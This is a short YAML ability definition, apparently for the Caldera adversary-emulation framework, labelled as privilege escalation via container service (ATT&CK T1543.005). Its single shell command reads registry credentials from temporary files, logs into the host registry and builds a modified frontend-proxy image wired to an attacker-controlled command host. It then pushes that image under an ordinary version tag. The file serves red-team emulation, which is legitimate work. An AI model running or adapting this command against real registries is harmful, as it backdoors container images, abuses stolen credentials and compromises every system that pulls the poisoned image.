- id: 60000000-0000-0000-0000-000000000011
  name: Modify container Proxy
  description: Image modification of frontend-proxy
  tactic: privilege-escalation
  technique: { attack_id: T1543.005, name: Container Service }
  repeatable: false
  singleton: true
  platforms:
    linux: { sh: { command: "sleep $W611 && docker login $HOSTREGISTRY -u $(cat /tmp/user) -p $(cat /tmp/pass) && docker build --build-arg CALDERA_HOST=$ATTACKERADDR -f /utils/proxy/Dockerfile -t $HOSTREGISTRY/frontend-proxy:2.0.2 /utils/proxy && docker push $HOSTREGISTRY/frontend-proxy:2.0.2", timeout: 900 } }